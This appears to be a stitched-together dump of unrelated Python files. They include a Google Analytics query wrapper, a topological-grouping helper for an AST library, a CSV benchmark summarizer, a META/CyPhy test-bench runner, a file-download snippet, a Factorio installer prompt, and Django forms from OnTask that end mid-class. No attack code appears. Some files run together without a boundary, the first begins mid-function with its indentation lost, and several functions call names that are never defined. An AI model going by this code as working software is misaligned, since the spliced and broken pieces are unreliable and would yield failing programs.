    return discovery.build(API_NAME, API_VERSION, credentials=credentials)
def _prefix_ga(value):
prefix = ''
if value[0] == '-':
value = value[1:]
prefix = '-'
if not value.startswith('ga:'):
prefix += "ga:"
return prefix + value
class Client(object):
    """Thin wrapper that holds an authenticated Google API service."""

    def __init__(self, service):
        self.service = service

    def query(self):
        """Return a QueryClient bound to the wrapped service."""
        return QueryClient(self.service)
class QueryClient(object):
    """Builds Google Analytics query parameters and executes requests
    against the wrapped API service."""

    def __init__(self, service):
        # BUG FIX: the original called super(Client, self).__init__(service),
        # which raises TypeError because QueryClient is not a Client subclass.
        self.service = service

    def _to_list(self, value):
        """Turn an argument into a list (None -> [], scalar -> [scalar])."""
        if value is None:
            return []
        elif isinstance(value, list):
            return value
        else:
            return [value]

    def _to_ga_param(self, values):
        """Turn a list of values into a GA list parameter."""
        return ','.join(map(_prefix_ga, values))

    def get(self, ids, start_date, end_date, metrics,
            dimensions=None, filters=None,
            max_results=None, sort=None, segment=None):
        """Normalise the query arguments and execute the request.

        start_date/end_date must be date-like objects supporting strftime.
        """
        ids = self._to_list(ids)
        metrics = self._to_list(metrics)
        start_date = start_date.strftime("%Y-%m-%d")
        end_date = end_date.strftime("%Y-%m-%d")
        dimensions = self._to_list(dimensions)
        filters = self._to_list(filters)
        sort = self._to_list(sort)
        # BUG FIX: the original called a nonexistent self._get_response and
        # passed metrics/dimensions both positionally and as keywords,
        # raising TypeError on every call.
        return self.get_raw_response(
            ids=self._to_ga_param(ids),
            start_date=start_date,
            end_date=end_date,
            metrics=self._to_ga_param(metrics),
            dimensions=self._to_ga_param(dimensions) or None,
            filters=self._to_ga_param(filters) or None,
            sort=self._to_ga_param(sort) or None,
            max_results=max_results,
            segment=segment
        )

    def _filter_empty(self, kwargs, key):
        # Drop a keyword argument when its value is None.
        if key in kwargs and kwargs[key] is None:
            del kwargs[key]
        return kwargs

    def get_raw_response(self, **kwargs):
        # Remove specific keyword arguments if they are `None`
        for arg in "dimensions filters sort max_results segment".split():
            kwargs = self._filter_empty(kwargs, arg)
        # NOTE(review): the v4 API uses reports().batchGet with a request
        # body; this call mixes v3-style parameters -- confirm against the
        # API version actually targeted.
        return self.service.report().batchGet(**kwargs).execute()
|
import itertools
from syloga.transform.get_assignments import get_assignments
from syloga.ast.traversal.iter_dependees import iter_dependees
from syloga.ast.traversal.iter_dependencies import iter_dependencies
from syloga.utils.functional import compose
from syloga.utils.functional import iter_unique
from syloga.ast.core import Indexed
from syloga.ast.containers import Tuple
def iter_generic_topo_group(iterable, get_dependees, get_dependencies):
    """Yield the items of *iterable* grouped in topological order.

    Each yielded group is the list (in input order) of the remaining items
    whose dependencies are all either produced by earlier groups or external
    (never produced by any item at all).

    Args:
        iterable: items to order.
        get_dependees: item -> iterable of values the item defines.
        get_dependencies: item -> iterable of values the item needs.

    Raises:
        ValueError: if a dependency cycle prevents any further progress
            (the original implementation looped forever in this case).
    """
    items = list(iterable)

    def flatten(fn, seq):
        # Apply fn to every element and chain all results into one list.
        return list(itertools.chain.from_iterable(map(fn, seq)))

    def partition(pred, seq):
        # Bug fix: the original called an undefined name `list_partition`;
        # this provides the (matching, non-matching) split it implied.
        hits = [x for x in seq if pred(x)]
        misses = [x for x in seq if not pred(x)]
        return hits, misses

    # Everything any item produces; values outside this set are external
    # inputs and count as already resolved.
    all_dependees = set(flatten(get_dependees, items))
    resolved_dependees = set()

    def is_resolved(dep):
        return dep in resolved_dependees or dep not in all_dependees

    def ready(item):
        return all(is_resolved(d) for d in get_dependencies(item))

    unresolved_items = items
    while unresolved_items:
        group, unresolved_items = partition(ready, unresolved_items)
        if not group:
            # No progress possible: remaining items depend on each other.
            raise ValueError("dependency cycle detected among remaining items")
        yield group
        resolved_dependees.update(flatten(get_dependees, group))
def list_generic_topo_group(iterable, get_dependees, get_dependencies):
    """Materialize iter_generic_topo_group() into a list of groups."""
    groups = iter_generic_topo_group(iterable, get_dependees, get_dependencies)
    return list(groups)
def topo_depth(expression):
    """Return the number of topological groups (depth of the dependency DAG)."""
    groups = topo_group(expression)
    return len(groups)
def topo_group(expression, sort_in_group = True):
    """Group the assignments of *expression* into a Tuple of Tuples, one per
    topological level; optionally sort assignments within each group.

    NOTE(review): `preorder_traversal` is used here but is neither defined
    nor imported in this module — confirm it is meant to come from syloga.
    """
    assignments = get_assignments(expression, preorder_traversal)
    #is_lvalue = lambda x: isinstance(x, (Symbol, Indexed, Indexable))
    #list_lvalues = lambda x: list(filter(is_lvalue,preorder_traversal(x)))
    # Accessors for the two sides of an assignment (get_rhs appears unused).
    get_lhs = lambda x: x.lhs
    get_rhs = lambda x: x.rhs
    # Unique dependees/dependencies of an assignment, as lists.
    get_dependees = compose(
        list,
        iter_unique,
        iter_dependees,
    )
    get_dependencies = compose(
        list,
        iter_unique,
        iter_dependencies,
    )
    groups = list_generic_topo_group(
        assignments,
        get_dependees,
        get_dependencies
    )
    if sort_in_group:
        # Sort key: index tuple for Indexed lvalues, otherwise the
        # (name, id) split of the symbol's string form.
        # NOTE(review): `split_name_id` and `list_lvalues` are undefined in
        # this module (list_lvalues is only present in the commented-out
        # lambda above) — this branch raises NameError as written; verify
        # against the intended syloga helpers.
        sort_key = lambda lhs: (
            tuple([lhs.args])
            if type(lhs) == Indexed else
            tuple([split_name_id(str(lhs), -1)])
        )
        sort_group = lambda group: sorted(group, key=compose(
            sort_key,
            list_lvalues,
            get_lhs
        ))
        groups = map(sort_group, groups)
    # Wrap each group, and the sequence of groups, in syloga Tuple containers.
    groups = Tuple(*itertools.starmap(Tuple,groups))
    return groups
def topo_sort(assignments):
    """Flatten the sorted topological groups into a single Tuple."""
    grouped = topo_group(assignments, sort_in_group=True)
    return Tuple(*itertools.chain(*grouped))
|
##################################################
## A helper to summarize the statistics from a ##
## concurrent run for the query workload. ########
##################################################
import argparse
import pprint
import glob
import os
import csv
import numpy as np
if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog = 'Summarize query latency', description='Summarize the runs from the multiple files emitted from a concurrent run.')
    parser.add_argument('--directory', '-d', dest="directory", action = "store", required = True, help = "The directory which has the runs for the experiment being summarized.")
    parser.add_argument('--pattern', '-p', dest="pattern", action = "store", default = "*.csv", help = "Pattern to search for in the files.")
    parser.add_argument('--output-file', '-o', dest="outputFile", action = "store", required = True, help = "The output file to store summarized output.")
    args = parser.parse_args()
    print(args)

    if not os.path.isdir(args.directory):
        print("Invalid path: ", args.directory)
        exit()

    headerString = None
    perQueryStats = dict()            # query name -> list of per-file stat rows
    perQueryAggregatedStats = dict()  # query name -> per-column averages
    try:
        ## Convert to absolute path. Add a trailing separator if it doesn't exist
        absoluteDirPath = os.path.join(os.path.abspath(args.directory), '')
        fileCount = 0
        ## Recursively read the files that contain the per-thread summary based on the specified file pattern.
        for filename in glob.iglob(absoluteDirPath + os.path.join('**', args.pattern), recursive=True):
            with open(filename) as csvfile:
                lineReader = csv.reader(csvfile)
                header = True
                ## Each file is a comma-separated summary of one thread's execution stats:
                ## a header row, then rows of "<query name>,<stat>,<stat>,...".
                ## Example file with header and one row:
                ## Query type, Total Count, Successful Count, Avg. latency (in secs), Std dev latency (in secs), Median, 90th perc (in secs), 99th Perc (in secs), Geo Mean (in secs)
                ## do-q1,11586.5,11586.5,0.47,0.156,0.451,0.525,0.729,0.463
                for row in lineReader:
                    if header:
                        ## We assume all files have the same header row. So save the row of one of the files.
                        headerString = row
                        header = False
                        continue
                    ## The first column is the name of the query; collect its stats across all the files.
                    if row[0] not in perQueryStats:
                        perQueryStats[row[0]] = list()
                    ## Store the stats second column onwards.
                    perQueryStats[row[0]].append([float(x) for x in row[1:]])
            fileCount += 1

        ## Robustness fix: previously an empty match fell through and wrote a
        ## `None` header row plus an empty summary file.
        if fileCount == 0:
            print("No files matching '{0}' found under: {1}".format(args.pattern, absoluteDirPath))
            exit()

        for key in perQueryStats.keys():
            value = perQueryStats[key]
            ## For each column, compute the average across all the files.
            perElementAvg = np.average(value, axis=0)
            perQueryAggregatedStats[key] = ["{0}".format(round(x, 3)) for x in perElementAvg]

        ## Write the summary in the aggregate file in the same format as the original files:
        ## first row is the header read from the files, subsequent rows are the
        ## per-operation averages across all the files found in the specified path.
        outputFile = os.path.join(args.directory, args.outputFile)
        print("Processed {0} files. Summary written to: {1}".format(fileCount, outputFile))
        ## newline='' is the documented way to open a file for csv.writer
        ## (avoids blank lines on Windows).
        with open(outputFile, 'w', newline='') as out:
            writer = csv.writer(out)
            writer.writerow(headerString)
            for key in perQueryAggregatedStats.keys():
                row = [key]
                row.extend(perQueryAggregatedStats[key])
                writer.writerow(row)
    except Exception as e:
        pprint.pprint(e)
        ## Bug fix: bare `raise` re-raises the active exception with its
        ## original traceback intact (`raise e` re-raised from this frame).
        raise
# coding: utf-8
r"""
Run MasterInterpreter on TestBenches, run the JobManager command, and compare Metrics to MetricConstraints.
e.g.
META\bin\Python27\Scripts\python META\bin\RunTestBenches.py --max_configs 2 "Master Combined.mga" -- -s --with-xunit
"""
import os
import os.path
import operator
import unittest
import nose.core
import subprocess
import json
import itertools
import collections
from nose.loader import TestLoader
from nose.plugins.manager import BuiltinPluginManager
from nose.config import Config, all_config_files
from win32com.client import DispatchEx
# NOTE(review): DispatchEx is aliased as Dispatch for the rest of the file —
# presumably to get a dedicated COM server instance per run; confirm intent.
Dispatch = DispatchEx

import _winreg as winreg
# Read the META install location from the registry; used later to locate
# the bundled Python interpreter.
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Software\META") as software_meta:
    meta_path, _ = winreg.QueryValueEx(software_meta, "META_PATH")
def log(s):
    """Log a message to stdout."""
    # Parenthesized form behaves identically under Python 2 (a single
    # parenthesized argument) and is also valid Python 3 syntax.
    print(s)
class TestBenchTest(unittest.TestCase):
    """Test case populated at runtime: one test method is attached per
    (TestBench/PET, configuration) pair by the __main__ driver below."""

    def __init__(self, *args):
        super(TestBenchTest, self).__init__(*args)
        self.longMessage = True

    # this class will get methods added to it

    def _testTestBench(self, context, master, config):
        # Run the Master Interpreter for this context/config and fail the
        # test immediately if elaboration itself failed.
        result = master.RunInTransactionWithConfigLight(config)[0]
        if not result.Success:
            self.fail(result.Exception)
        print 'Output directory is {}'.format(result.OutputDirectory)
        project = context.Project
        # Read the context kind inside a read-only transaction.
        project.BeginTransactionInNewTerr()
        try:
            kind = context.Meta.Name
        finally:
            project.AbortTransaction()
        if kind == 'ParametricExploration':
            # PETs run through openmdao; metrics are checked after every
            # recorded iteration and once more at the end.
            import run_mdao
            import openmdao.api
            originalDir = os.getcwd()
            test = self

            class ConstraintCheckingRecorder(openmdao.api.BaseRecorder):
                # Recorder whose only job is to re-check metric constraints
                # on each iteration of the PET driver.
                def record_metadata(self, group):
                    pass

                def record_derivatives(self, derivs, metadata):
                    pass

                def record_iteration(self, *args, **kwargs):
                    test._checkParametricExplorationMetrics(context, self.root)

                def close(self):
                    pass

                def startup(self, root):
                    super(ConstraintCheckingRecorder, self).startup(root)
                    self.root = root
            # run_mdao expects to run from the generated output directory.
            os.chdir(result.OutputDirectory)
            try:
                mdao_top = run_mdao.run('mdao_config.json', additional_recorders=[ConstraintCheckingRecorder()])
            finally:
                os.chdir(originalDir)
            self._checkParametricExplorationMetrics(context, mdao_top.root)
        else:
            # Plain TestBench: execute via the bundled interpreter and
            # testbenchexecutor, surfacing _FAILED.txt contents on error.
            try:
                subprocess.check_call((os.path.join(meta_path, r'bin\Python27\Scripts\python.exe'), '-m', 'testbenchexecutor', '--detailed-errors', 'testbench_manifest.json'),
                    cwd=result.OutputDirectory)
            except:
                failed_txt = os.path.join(result.OutputDirectory, '_FAILED.txt')
                if os.path.isfile(failed_txt):
                    print(open(failed_txt, 'r').read())
                raise
            with open(os.path.join(result.OutputDirectory, 'testbench_manifest.json')) as manifest_file:
                manifest = json.load(manifest_file)
            self.assertEqual(manifest['Status'], 'OK')
            self._checkTestBenchMetrics(context, manifest, result.OutputDirectory)
            # metrics = {metric['GMEID']: metric['Value'] for metric in manifest['Metrics']}

    def _checkParametricExplorationMetrics(self, pet, mdao_group):
        # Walk the PET tree and compare every Metric bound via a
        # MetricConstraintBinding against its constraint.
        project = pet.Project
        project.BeginTransactionInNewTerr()
        root = pet

        def getPathNames(pet):
            # Path of model names from the root PET down to `pet` (exclusive
            # of the root), used to navigate the nested openmdao groups.
            ret = []
            while pet.ID != root.ID:
                ret.append(pet.Name)
                pet = pet.ParentModel
            ret.reverse()
            return ret
        try:
            def getMetricValue(metric_fco, pet, ref):
                # Resolve the metric's value from the openmdao unknowns of
                # the component (or referenced TestBench) that owns it.
                componentName = metric_fco.ParentModel.Name
                if ref is not None:
                    componentName = ref.Name
                group = mdao_group
                for name in getPathNames(pet):
                    group = getattr(group, name)._problem.root
                return getattr(group, componentName).unknowns[metric_fco.Name]
            # Breadth of the PET tree is traversed with an explicit stack.
            queue = collections.deque()
            queue.append(pet)
            while queue:
                pet = queue.pop()
                for childPET in (p for p in pet.ChildFCOs if p.Meta.Name == 'ParametricExploration'):
                    queue.append(childPET)
                # Bindings directly inside this PET.
                for constraintBinding in (me for me in pet.ChildFCOs if me.MetaBase.Name == 'MetricConstraintBinding'):
                    # The binding may point either way; normalize ends.
                    if constraintBinding.Src.Meta.Name == 'Metric':
                        metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
                        metric_refs = constraintBinding.SrcReferences
                    else:
                        constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
                        metric_refs = constraintBinding.DstReferences
                    testBenchRef = metric_refs.Item(1) if len(metric_refs) else None
                    value = getMetricValue(metric_fco, pet, testBenchRef)
                    parentName = testBenchRef.Name if testBenchRef else metric_fco.ParentModel.Name
                    self._testMetricConstraint(value, constraintBinding, metric_name='.'.join(itertools.chain(getPathNames(pet), [parentName, metric_fco.Name])))
                # Bindings inside TestBenches referenced by this PET.
                for testBenchRef in (tb for tb in pet.ChildFCOs if tb.Meta.Name == 'TestBenchRef'):
                    for constraintBinding in (me for me in testBenchRef.Referred.ChildFCOs if me.MetaBase.Name == 'MetricConstraintBinding'):
                        if constraintBinding.Src.Meta.Name == 'Metric':
                            metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
                        else:
                            constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
                        value = getMetricValue(metric_fco, pet, testBenchRef)
                        self._testMetricConstraint(value, constraintBinding, metric_name='.'.join(itertools.chain(getPathNames(pet), [testBenchRef.Name, metric_fco.Name])))
        finally:
            project.AbortTransaction()

    def _checkTestBenchMetrics(self, testBench, manifest, outputDir):
        # Compare manifest metric values against the constraints bound to
        # the TestBench's metrics.
        project = testBench.Project
        project.BeginTransactionInNewTerr()
        try:
            manifestMetrics = {m['Name']: m['Value'] for m in manifest['Metrics']}

            def getMetricValue(metric_fco):
                return manifestMetrics[metric_fco.Name]
            for constraintBinding in (me for me in testBench.ChildFCOs if me.MetaBase.Name == 'MetricConstraintBinding'):
                if constraintBinding.Src.Meta.Name == 'Metric':
                    metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
                else:
                    constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
                value = getMetricValue(metric_fco)
                self._testMetricConstraint(value, constraintBinding)
        finally:
            project.AbortTransaction()

    def _testMetricConstraint(self, value, constraintBinding, metric_name=None):
        # Assert one metric value against its constraint's target.
        if constraintBinding.Src.Meta.Name == 'Metric':
            metric_fco, constraint = constraintBinding.Src, constraintBinding.Dst
        else:
            constraint, metric_fco = constraintBinding.Src, constraintBinding.Dst
        target_type = constraint.GetStrAttrByNameDisp('TargetType')
        target_value = constraint.GetFloatAttrByNameDisp('TargetValue')
        try:
            value_float = float(value)
        except ValueError:
            self.fail('Metric {} has value "{}" that is not a number'.format(metric_fco.Name, value))
        # Map the constraint's TargetType onto the matching unittest assert;
        # anything unrecognized falls back to approximate equality.
        if target_type == 'Must Exceed':
            test = self.assertGreater
        elif target_type == 'Must Not Exceed':
            test = self.assertLessEqual
        else:
            test = self.assertAlmostEqual
        test(value_float, target_value, msg='Metric {} failed'.format(metric_name or metric_fco.Name))
def crawlForKinds(root, folderKinds, modelKinds):
    """Walk the folder tree under *root* and yield FCOs whose kind matches.

    Only descends into child folders whose MetaBase.Name is in folderKinds;
    yields children whose Meta.Name is in modelKinds.
    """
    pending = collections.deque([root])
    while pending:
        current = pending.pop()  # pop from the right: depth-first order
        for sub in current.ChildFolders:
            if sub.MetaBase.Name in folderKinds:
                pending.append(sub)
        for fco in current.ChildFCOs:
            if fco.Meta.Name in modelKinds:
                yield fco
if __name__ == '__main__':
    def run():
        import argparse
        parser = argparse.ArgumentParser(description='Run TestBenches.')
        parser.add_argument('--max_configs', type=int)
        parser.add_argument('--run_desert', action='store_true')
        parser.add_argument('model_file')
        # Everything after `--` is forwarded verbatim to nose.
        parser.add_argument('nose_options', nargs=argparse.REMAINDER)
        command_line_args = parser.parse_args()

        project = Dispatch("Mga.MgaProject")
        mga_file = command_line_args.model_file
        if mga_file.endswith('.xme'):
            # An .xme export must first be parsed into a fresh .mga project.
            project = Dispatch("Mga.MgaProject")
            parser = Dispatch("Mga.MgaParser")
            resolver = Dispatch("Mga.MgaResolver")
            resolver.IsInteractive = False
            parser.Resolver = resolver
            mga_file = os.path.splitext(command_line_args.model_file)[0] + ".mga"
            project.Create("MGA=" + os.path.abspath(mga_file), "CyPhyML")
            parser.ParseProject(project, command_line_args.model_file)
        else:
            # n.b. without abspath, things break (e.g. CyPhy2CAD)
            project.OpenEx("MGA=" + os.path.abspath(command_line_args.model_file), "CyPhyML", None)

        project.BeginTransactionInNewTerr()
        try:
            if command_line_args.run_desert:
                # Optionally run the design-space (DESERT) expansion first so
                # designs have Configurations/CWC models to iterate over.
                desert = Dispatch("MGA.Interpreter.DesignSpaceHelper")
                desert.Initialize(project)
                filter = project.CreateFilter()
                filter.Kind = "DesignContainer"
                # FIXME wont work right for TBs that point to non-root design sace
                designContainers = [tb for tb in project.AllFCOs(filter) if not tb.IsLibObject and tb.ParentFolder is not None]
                for designContainer in designContainers:
                    desert.InvokeEx(project, designContainer, Dispatch("MGA.MgaFCOs"), 128)

            def add_fail(masterContext, configName, message):
                # Attach a test method that always fails with `message`.
                def fail(self):
                    raise ValueError(message)
                fail.__name__ = str('test_' + masterContext.Name + "__" + configName)
                setattr(TestBenchTest, fail.__name__, fail)

            def add_test(masterContext, mi_config, config):
                # Attach a test method that runs this context/config pair.
                def testTestBench(self):
                    self._testTestBench(masterContext, master, mi_config)
                # testTestBench.__name__ = str('test_' + masterContext.Name + "_" + masterContext.ID + "__" + config.Name)
                testTestBench.__name__ = str('test_' + masterContext.Name + "__" + config.Name)
                setattr(TestBenchTest, testTestBench.__name__, testTestBench)

            master = Dispatch("CyPhyMasterInterpreter.CyPhyMasterInterpreterAPI")
            master.Initialize(project)
            modelKinds = set(("TestBench", "CADTestBench", "KinematicTestBench", "BlastTestBench", "BallisticTestBench", "CarTestBench", "CFDTestBench", "ParametricExploration"))
            # masterContexts = [tb for tb in itertools.chain(*(project.AllFCOs(filter) for filter in filters)) if not tb.IsLibObject]
            masterContexts = list(crawlForKinds(project.RootFolder, ("ParametricExplorationFolder", "Testing"), modelKinds))
            print repr([t.Name for t in masterContexts])
            for masterContext in masterContexts:
                configs = None
                if masterContext.Meta.Name == "ParametricExploration":
                    # A PET without TestBenchRefs is its own "configuration".
                    tbs = [tb for tb in masterContext.ChildFCOs if tb.MetaBase.Name == 'TestBenchRef' and tb.Referred is not None]
                    if not tbs:
                        configs = [masterContext]
                    else:
                        testBench = tbs[0].Referred
                else:
                    testBench = masterContext
                if not configs:
                    # Derive configurations from the TestBench's system
                    # under test: either the ComponentAssembly itself, or
                    # the CWCs produced by design-space expansion.
                    suts = [sut for sut in testBench.ChildFCOs if sut.MetaRole.Name == 'TopLevelSystemUnderTest']
                    if len(suts) == 0:
                        add_fail(masterContext, 'invalid', 'Error: TestBench "{}" has no TopLevelSystemUnderTest'.format(testBench.Name))
                        continue
                    if len(suts) > 1:
                        add_fail(masterContext, 'invalid', 'Error: TestBench "{}" has more than one TopLevelSystemUnderTest'.format(testBench.Name))
                        continue
                    sut = suts[0]
                    if sut.Referred.MetaBase.Name == 'ComponentAssembly':
                        configs = [sut.Referred]
                    else:
                        configurations = [config for config in sut.Referred.ChildFCOs if config.MetaBase.Name == 'Configurations']
                        if not configurations:
                            add_fail(masterContext, 'invalid', 'Error: design has no Configurations models. Try using the --run_desert option')
                            continue
                        configurations = configurations[0]
                        cwcs = [cwc for cwc in configurations.ChildFCOs if cwc.MetaBase.Name == 'CWC' and cwc.Name]
                        if not cwcs:
                            raise ValueError('Error: could not find CWCs for "{}"'.format(testBench.Name))
                        configs = list(cwcs)
                # FIXME cfg2 > cfg10
                configs.sort(key=operator.attrgetter('Name'))
                # Honor --max_configs (None slices to the full list).
                configs = configs[slice(0, command_line_args.max_configs)]
                for config in configs:
                    mi_config = Dispatch("CyPhyMasterInterpreter.ConfigurationSelectionLight")
                    # GME id, or guid, or abs path or path to Test bench or SoT or PET
                    mi_config.ContextId = masterContext.ID
                    mi_config.SetSelectedConfigurationIds([config.ID])
                    # mi_config.KeepTemporaryModels = True
                    mi_config.PostToJobManager = False
                    add_test(masterContext, mi_config, config)
        finally:
            project.CommitTransaction()

        # Hand the dynamically-populated TestBenchTest class to nose.
        config = Config(files=all_config_files(), plugins=BuiltinPluginManager())
        config.configure(argv=['nose'] + command_line_args.nose_options)
        loader = TestLoader(config=config)
        tests = [loader.loadTestsFromTestClass(TestBenchTest)]
        try:
            nose.core.TestProgram(suite=tests, argv=['nose'] + command_line_args.nose_options, exit=True, testLoader=loader, config=config)
        finally:
            # project.Save(project.ProjectConnStr + "_debug.mga", True)
            project.Close(True)
    run()
|
'''
Author: your name
Date: 2022-02-14 11:41:47
LastEditTime: 2022-02-14 12:10:52
LastEditors: Please set LastEditors
Description: 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE
FilePath: \Work\Lensi\download_try.py
'''
from urllib.request import urlretrieve

# Download target (note: the signed URL carries an Expires timestamp, so it
# may no longer be valid when re-run).
url = "https://dl5.filehippo.com/970/a88/349cf04cf44eeb26171a12b3c423b95ce3/geek.zip?Expires=1644851477&Signature=688ecc6881adcafce3b34e2b86b5df2cab0d7bb4&url=https://filehippo.com/download_geek-uninstaller/&Filename=geek.zip"
# Local name "app" plus whatever extension follows the last dot in the URL.
extension = url[url.rfind("."):]
url_name = "app" + extension
urlretrieve(url, url_name)
|
from __future__ import print_function, unicode_literals
from PyInquirer import style_from_dict, Token, prompt, Separator
from examples import custom_style_1
from examples import custom_style_2
from examples import custom_style_3
from pprint import pprint
import os, errno
import wget
import urllib.request
import shutil
from pathlib import Path
import subprocess
from flask import Flask, render_template, request
from werkzeug.utils import secure_filename
import json
# Factocli installs the following:
# a headless factorio server
# a flask webserver for the statistics
# a flask api for the android app
# Choise is experimental server
# give the path where factorio must be installed
#
def ask_path_to_install_server():
    """Prompt the user for the factorio install directory and return it."""
    question = {
        'type': 'input',
        'name': 'install_path',
        'message': 'Where do you want to install factorio? # /opt is recommended!',
    }
    return prompt(question)['install_path']
def confirm_where_to_install(path):
    """Ask the user to confirm installing into *path*; return the yes/no answer."""
    question = {
        'type': 'confirm',
        'name': 'confirm_where_to_install',
        'message': 'Are you sure you want to install in ' + path + " ?",
    }
    return prompt(question)['confirm_where_to_install']
def install_server_main():
    """Drive the interactive install: ask for a path, confirm, then install.

    The two original branches ('~'-prefixed path vs. absolute path) were
    byte-for-byte duplicates apart from the path value; they are now folded
    into the single helper _install_into().
    """
    install_path = ask_path_to_install_server()
    print(install_path)
    yesorno = confirm_where_to_install(install_path)
    if not yesorno:
        print("Please try again")
        return
    print("Checking path...")
    if install_path.startswith("~"):
        # Expand a leading '~' to the user's home directory.
        install_path = str(Path.home()) + install_path[1:]
        print(install_path)
    _install_into(install_path)


def _install_into(install_path):
    """Validate that *install_path* exists and run the install steps there."""
    if not os.path.isdir(install_path):
        # Bug fix: original message lacked spaces and read
        # "The directory<path>doesn't exists".
        print("The directory " + install_path + " doesn't exist")
        print("please make sure the directory exists")
        return
    print("The directory " + install_path + " exists...")
    try:
        #os.makedirs(install_path, exist_ok=False)
        print("Proceeding with the install...")
        #Download the latest factorio expermimental headless server file
        #download_latest_factorio_headless_server(install_path,url_version)
    except FileExistsError:
        # directory already exists (only reachable once makedirs is enabled)
        print("Error Creating the directory in " + install_path)
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import json
import re
from datetimewidget.widgets import DateTimeWidget
from django import forms
from django.utils.translation import ugettext_lazy as _
from django_summernote.widgets import SummernoteInplaceWidget
from validate_email import validate_email
from dataops.pandas_db import execute_select_on_table, get_table_cursor, \
is_column_table_unique, get_table_data
from ontask import ontask_prefs, is_legal_name
from ontask.forms import column_to_field, dateTimeOptions, RestrictedFileField
from .models import Action, Condition
# Field prefix to use in forms to avoid using column names (they are given by
# the user and may pose a problem (injection bugs)
field_prefix = '___ontask___select_'

# Bug fix: raw string so '\d' is a regex digit class, not an invalid string
# escape (DeprecationWarning today, SyntaxError in future Python versions).
participant_re = re.compile(r'^Participant \d+$')
class ActionUpdateForm(forms.ModelForm):
    """Form to edit the name and description of an existing Action.

    The calling view passes the request user and the workflow through the
    keyword arguments; both are popped before the ModelForm machinery runs.
    """

    def __init__(self, *args, **kwargs):
        self.workflow = kwargs.pop(str('action_workflow'), None)
        self.user = kwargs.pop(str('workflow_user'), None)
        super(ActionUpdateForm, self).__init__(*args, **kwargs)

    class Meta:
        model = Action
        fields = ('name', 'description_text')
class ActionForm(ActionUpdateForm):
    # Same as ActionUpdateForm but additionally exposes the action type
    # (used when creating a new action rather than editing one).
    class Meta:
        model = Action
        fields = ('name', 'description_text', 'action_type')
class ActionDescriptionForm(forms.ModelForm):
    # Minimal form exposing only the action's description text.
    class Meta:
        model = Action
        fields = ('description_text',)
class EditActionOutForm(forms.ModelForm):
    """
    Main class to edit an action out.

    Personalized-text actions edit their content through a Summernote rich
    editor; every other action type gets a plain textarea for the JSON body
    plus an extra target_url field.
    """
    content = forms.CharField(label='', required=False)

    def __init__(self, *args, **kwargs):
        super(EditActionOutForm, self).__init__(*args, **kwargs)

        if self.instance.action_type != Action.PERSONALIZED_TEXT:
            # Add the target_url field
            self.fields['target_url'] = forms.CharField(
                initial=self.instance.target_url,
                label=_('Target URL'),
                strip=True,
                required=False,
                widget=forms.Textarea(
                    attrs={
                        'rows': 1,
                        'cols': 120,
                        'placeholder': _('URL to send the personalized JSON')
                    }
                )
            )
            # Modify the content field so that it uses the TextArea
            self.fields['content'].widget = forms.Textarea(
                attrs={'cols': 80,
                       'rows': 15,
                       'placeholder': _('Write a JSON object')}
            )
        else:
            self.fields['content'].widget = SummernoteInplaceWidget()

    class Meta:
        model = Action
        fields = ('content',)
# Form to enter values in a row
class EnterActionIn(forms.Form):
    """Dynamic form with one field per column of a table row.

    Key columns are skipped unless show_key is given; when shown, they are
    rendered read-only and disabled.
    """

    def __init__(self, *args, **kargs):
        # Store the instance
        self.columns = kargs.pop('columns', None)
        self.values = kargs.pop('values', None)
        self.show_key = kargs.pop('show_key', False)

        super(EnterActionIn, self).__init__(*args, **kargs)

        # If no initial values have been given, replicate a list of Nones
        if not self.values:
            self.values = [None] * len(self.columns)

        for idx, column in enumerate(self.columns):
            # Skip the key columns if flag is true
            if column.is_key and not self.show_key:
                continue

            field_name = field_prefix + '%s' % idx
            self.fields[field_name] = column_to_field(
                column,
                self.values[idx],
                label=column.description_text)

            if column.is_key:
                # Key values are shown but must never be edited.
                key_field = self.fields[field_name]
                key_field.widget.attrs['readonly'] = 'readonly'
                key_field.disabled = True
class FilterForm(forms.ModelForm):
    """
    Form to read information about a filter. The required property of the
    formula field is set to False because it is enforced in the server.
    """

    def __init__(self, *args, **kwargs):
        super(FilterForm, self).__init__(*args, **kwargs)
        formula_field = self.fields['formula']
        # Required enforced in the server (not in the browser)
        formula_field.required = False
        # Filter should be hidden.
        formula_field.widget = forms.HiddenInput()

    class Meta:
        model = Condition
        fields = ('name', 'description_text', 'formula')
class ConditionForm(FilterForm):
    """
    Form to read information about a condition. The same as the filter but we
    need to enforce that the name is a valid variable name
    """

    def __init__(self, *args, **kwargs):
        super(ConditionForm, self).__init__(*args, **kwargs)

        # Remember the condition name to perform content substitution.
        # Bug fix: the original line ended with a stray comma
        # (`self.old_name = None,`), binding the tuple (None,) instead of None.
        self.old_name = None
        if hasattr(self, 'instance'):
            self.old_name = self.instance.name

    def clean(self):
        data = super(ConditionForm, self).clean()

        # Robustness: use .get() — when the name field itself failed
        # validation it is absent from cleaned_data and the original
        # data['name'] raised KeyError instead of reporting a form error.
        name = data.get('name')
        if name:
            msg = is_legal_name(name)
            if msg:
                self.add_error('name', msg)

        return data
class EnableURLForm(forms.ModelForm):
    """Form to toggle serving an action by URL and its active time window."""

    def clean(self):
        data = super(EnableURLForm, self).clean()

        # Check the datetimes. One needs to be after the other
        window_start = self.cleaned_data['active_from']
        window_end = self.cleaned_data['active_to']
        if window_start and window_end and window_start >= window_end:
            message = _('Incorrect date/time window')
            self.add_error('active_from', message)
            self.add_error('active_to', message)

        return data

    class Meta:
        model = Action
        fields = ('serve_enabled', 'active_from', 'active_to')

        widgets = {
            'active_from': DateTimeWidget(options=dateTimeOptions,
                                          usel10n=True,
                                          bootstrap_version=3),
            'active_to': DateTimeWidget(options=dateTimeOptions,
                                        usel10n=True,
                                        bootstrap_version=3)
        }
class EmailActionForm(forms.Form):
    """Form collecting the parameters needed to send personalized emails.

    Initial values come from the operation payload stored by the view; the
    email column choices come from the workflow's column names.
    """

    subject = forms.CharField(max_length=1024,
